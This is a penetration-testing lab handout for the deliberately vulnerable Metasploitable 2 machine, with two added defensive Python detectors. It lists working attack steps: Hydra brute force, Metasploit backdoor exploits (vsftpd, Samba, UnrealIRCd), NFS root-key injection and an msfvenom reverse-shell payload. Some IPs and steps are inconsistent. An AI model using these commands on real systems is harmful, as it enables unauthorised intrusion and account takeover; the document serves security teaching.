Lab 1: Backdoor Attacks
The first lab on Metasploitable 2 was about the vsftpd backdoor; in this lab we will
discover more attacks and exploitations. The first step towards doing what we want to achieve is
a service scan that looks at all 65535 ports of Metasploitable 2 to see what is running where
and with what version.
nmap -p- -sV 10.10.1.10
Exercise 1: Exploiting Port 21: FTP
We have all our ports and services listed now, so let us start by exploiting port 21, which runs FTP.
1. Use Hydra for this. The two wordlists for this operation will have default login names
and passwords.
hydra -L user.txt -P pass.txt 10.10.1.10 ftp
2. Let’s put our findings to use and try to connect using FTP.
ftp 10.10.1.10
3. Use the FTP protocol to transfer user.txt and pass.txt to the directory /usr/local/testFiles on
the Metasploitable machine.
Exercise 2: Exploiting VSFTPD 2.3.4
We have exploited the service running on port 21; now we will exploit the particular version of
the FTP service. We will search for an exploit for VSFTPD 2.3.4 using Searchsploit.
searchsploit vsftpd
1. We now have our exploit, let’s get into Metasploit and run it.
2. Use exploit/unix/ftp/vsftpd_234_backdoor. This module exploits a malicious backdoor
that was added to the VSFTPD download archive. This backdoor was introduced into the
vsftpd-2.3.4.tar.gz archive between June 30th, 2011 and July 1st, 2011 according to the
most recent information available. This backdoor was removed on July 3rd, 2011.
Backdoor Attacks Lab Pr Meryeme Ayache
3. Set the RHOST variable to the IP of Metasploitable 2.
4. Run the exploit using the exploit command.
5. Detect the current user and use the ifconfig command to make sure that the exploit
succeeded.
Exercise 3: Exploiting Port 22 SSH
Metasploit has an auxiliary module that we will use on the SSH service running on port 22. Once
we get our session through it we will upgrade it to Meterpreter.
1. Run msfconsole and use auxiliary/scanner/ssh/ssh_login. This module will test
ssh logins on a range of machines and report successful logins. If you have loaded a
database plugin and connected to a database this module will record successful logins and
hosts so you can track your access.
2. Set user_file /root/Desktop/user.txt
3. Set pass_file /root/Desktop/pass.txt
4. Execute the auxiliary and detect which command shell is opened.
5. Detect which opened sessions are available, then upgrade the shell session with sessions -u NSession.
6. Detect the opened Meterpreter session and connect to it using sessions NSession.
7. Detect the current user and use the ifconfig command to make sure that the exploit
succeeded.
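The wordlist runs against FTP (Exercise 1) and SSH (Exercise 3) leave a clear trace on the target. This added example, which is not part of the lab handout, shows the detection side: it parses constructed vsftpd.log and sshd auth.log lines (the format is the standard one, the values are made up), counts failures per source address, and flags a success that follows a burst of failures as a likely compromised account.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not taken from the lab machine):
# vsftpd.log "OK/FAIL LOGIN" entries followed by syslog-style sshd entries.
SAMPLE_LOGS = """\
Mon Jul  4 10:00:01 2011 [pid 2101] [admin] FAIL LOGIN: Client "10.10.1.20"
Mon Jul  4 10:00:01 2011 [pid 2103] [msfadmin] FAIL LOGIN: Client "10.10.1.20"
Mon Jul  4 10:00:02 2011 [pid 2105] [user] FAIL LOGIN: Client "10.10.1.20"
Mon Jul  4 10:00:02 2011 [pid 2107] [msfadmin] OK LOGIN: Client "10.10.1.20"
Mon Jul  4 10:05:00 2011 [pid 2200] [msfadmin] OK LOGIN: Client "10.10.1.50"
Jul  4 10:10:01 metasploitable sshd[2301]: Failed password for invalid user admin from 10.10.1.20 port 40001 ssh2
Jul  4 10:10:01 metasploitable sshd[2303]: Failed password for msfadmin from 10.10.1.20 port 40002 ssh2
Jul  4 10:10:02 metasploitable sshd[2305]: Failed password for invalid user user from 10.10.1.20 port 40003 ssh2
Jul  4 10:10:02 metasploitable sshd[2307]: Accepted password for msfadmin from 10.10.1.20 port 40004 ssh2
"""

FTP_RE = re.compile(r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')
SSH_RE = re.compile(r'sshd\[\d+\]: (?P<result>Failed|Accepted) password for '
                    r'(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)')


def parse_login_events(text):
    """Return (service, ip, user, success) tuples for every FTP or SSH login line."""
    events = []
    for line in text.splitlines():
        m = FTP_RE.search(line)
        if m:
            events.append(("ftp", m["ip"], m["user"], m["result"] == "OK"))
            continue
        m = SSH_RE.search(line)
        if m:
            events.append(("ssh", m["ip"], m["user"], m["result"] == "Accepted"))
    return events


def find_bruteforce(events, threshold=3):
    """Group events per (service, source ip) and keep sources with >= threshold failures.

    A success that arrives after the threshold is reached is recorded as the
    account that was most likely guessed, which is the alert worth paging on."""
    stats = defaultdict(lambda: {"failures": 0, "users": set(), "success_after_failures": None})
    for service, ip, user, ok in events:
        s = stats[(service, ip)]
        if ok:
            if s["failures"] >= threshold:
                s["success_after_failures"] = user
        else:
            s["failures"] += 1
            s["users"].add(user)
    return {k: v for k, v in stats.items() if v["failures"] >= threshold}
```

The single clean login from 10.10.1.50 is not reported, only the source that failed repeatedly before succeeding.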
Exercise 4: Exploiting port 23 TELNET (Credential Capture)
1. Use Wireshark to capture the TCP traffic; it runs in the background while we
connect to Metasploitable 2 through telnet using "msfadmin" as both the user name
and the password.
2. Use auxiliary/scanner/telnet/telnet_login. This module will test a telnet login on a range
of machines and report successful logins. If you have loaded a database plugin and
connected to a database this module will record successful logins and hosts so you can
track your access. The same password and user file from earlier will be used for this.
3. Set RHOSTS 10.10.1.10
4. Set user_file /root/Desktop/user.txt
5. Set pass_file /root/Desktop/pass.txt
6. set stop_on_success true
7. Exploit the vulnerability using the opened Meterpreter session.
8. Use the ifconfig command to make sure that the exploit succeeded.
Exercise 5: Exploiting Port 139 & 445 (Samba)
Samba is running on both port 139 and port 445; we will exploit it using Metasploit. The default
port for this exploit is set to port 139, but it can be changed to port 445 as well.
1. Use exploit/multi/samba/usermap_script
2. Set RHOST 10.10.1.10
3. Run the exploit, then verify the current user and the network configuration.
Exercise 6: Exploiting Port 6667 (IRC)
1. Scan the network using nmap -sV 10.10.1.10 and look for the version of the IRC service. It
should be under port 6667.
2. Port 6667 has the Unreal IRCD service running; we will exploit it using a backdoor that is
available in Metasploit: use exploit/unix/irc/unreal_ircd_3281_backdoor.
This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download
archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009
and June 12th, 2010.
3. Run the exploit and execute ifconfig and whoami to prove your exploit worked.
Exercise 7: Exploiting Port 5900 (VNC)
Virtual Network Computing (VNC) runs on port 5900; this service can be exploited
using a module in Metasploit to find the login credentials.
This module will test a VNC server on a range of machines and report successful logins.
Currently, it supports RFB protocol versions 3.3, 3.7, 3.8 and 4.001 using the VNC
challenge-response authentication method.
1. Use auxiliary/scanner/vnc/vnc_login
2. Set RHOSTS 10.10.1.10
3. Exploit; you get the password after the "login successful" message.
4. Use the provided password to connect to VNC using vncviewer 10.10.1.10
Exercise 8: Privilege Escalation via Port 2049: NFS
In this method, we will create an SSH key without a passphrase and exchange it with the
SSH key of the victim machine for the root user.
First, we use ssh-keygen to generate an RSA key pair without a passphrase, then we place it in the
"/root/.ssh" folder, where the key is found by default. Once the key is created and placed, we
create a directory "/tmp/sshkey/" on our local machine.
The next part is a little tricky: we mount the directory we just made on the victim
machine using the Network File System (NFS) function. Once it is mounted, we write the key from our
machine into the victim's machine, a sort of override, using the cat command. The thing to keep
in mind here is that our key has no passphrase, so after the override the key on
the victim machine is also without a passphrase, and when we connect using ssh
it uses a blank password.
The key is now copied so we unmount the directory and connect as the root user using ssh.
a. showmount -e 192.168.1.103
b. ssh-keygen
c. mkdir /tmp/sshkey
d. mount -t nfs 192.168.1.103:/ /tmp/sshkey/
e. cat ~/.ssh/id_rsa.pub >> /tmp/sshkey/root/.ssh/authorized_keys
f. umount /tmp/sshkey
g. ssh root@192.168.1.103
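The chain above only works because the target exports its whole filesystem to every host without root squashing, so a client's root can write into /root/.ssh. This added example, not part of the lab handout, is the defender's check: it parses exports(5) syntax and reports the settings that make the chain possible, using a constructed weak line beside a tightened one.

```python
import re

# Constructed /etc/exports contents (not copied from the lab machine): the
# first mirrors the pattern the NFS exercise relies on, the second is tightened.
WEAK_EXPORTS = "/ *(rw,no_root_squash)\n"
SAFER_EXPORTS = "# shared read-only with one subnet, root mapped to nobody\n" \
                "/srv/share 10.10.1.0/24(ro,root_squash,sync)\n"

# one client entry: optional host/subnet pattern followed by optional (opt,opt,...)
ENTRY_RE = re.compile(r'(?P<client>[^\s(]*)(?:\((?P<opts>[^)]*)\))?')


def parse_exports(text):
    """Return [(path, [(client, {options}), ...]), ...] from exports(5) syntax."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        path, *entries = line.split()
        clients = []
        for entry in entries or ["*"]:           # no client field means everyone
            m = ENTRY_RE.fullmatch(entry)
            opts = {o.strip() for o in (m["opts"] or "").split(",") if o.strip()}
            clients.append((m["client"] or "*", opts))
        exports.append((path, clients))
    return exports


def audit_exports(text):
    """List the settings that let a remote root write a server-root-owned file.

    Defaults in exports(5) are ro and root_squash, so an entry with no options
    is not flagged for those two checks."""
    findings = []
    for path, clients in parse_exports(text):
        for client, opts in clients:
            where = f"{path} {client}"
            if path == "/":
                findings.append(f"{where}: whole filesystem exported")
            if client == "*":
                findings.append(f"{where}: export open to any host")
            if "no_root_squash" in opts:
                findings.append(f"{where}: no_root_squash maps client root to server root")
            if "rw" in opts:
                findings.append(f"{where}: writable export")
    return findings
```

Run audit_exports on the real file as a pre-flight check; an empty list means none of the four conditions is present, not that the export is safe for every purpose.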
Exercise 9: Damn Vulnerable Web App (DVWA)
What is Damn Vulnerable Web App (DVWA)?
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn
vulnerable.
Its main goals are to be an aid for security professionals to test their skills and tools in a
legal environment, help web developers better understand the processes of securing
web applications, and aid teachers/students to teach/learn web application security in a
classroom environment.
1. Log in to the DVWA web vulnerabilities using the Kali browser and try to exploit
some application vulnerabilities such as SQL injection or XSS.
Exercise 10: Linux Payload Using Msfvenom
1. Type the following command
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.10.1.10 lport=4444 -f elf > /root/Desktop/shell
2. Once the payload has been generated, send it to the victim to execute on their Linux machine
and start the multi handler.
a. msf > use exploit/multi/handler
b. msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
c. msf exploit(handler) > set lhost 10.10.1.10
d. msf exploit(handler) > set lport 4444
e. msf exploit(handler) > run
3. Once the payload is executed, it creates a reverse TCP connection back to our
multi/handler listener, providing us with a Meterpreter session.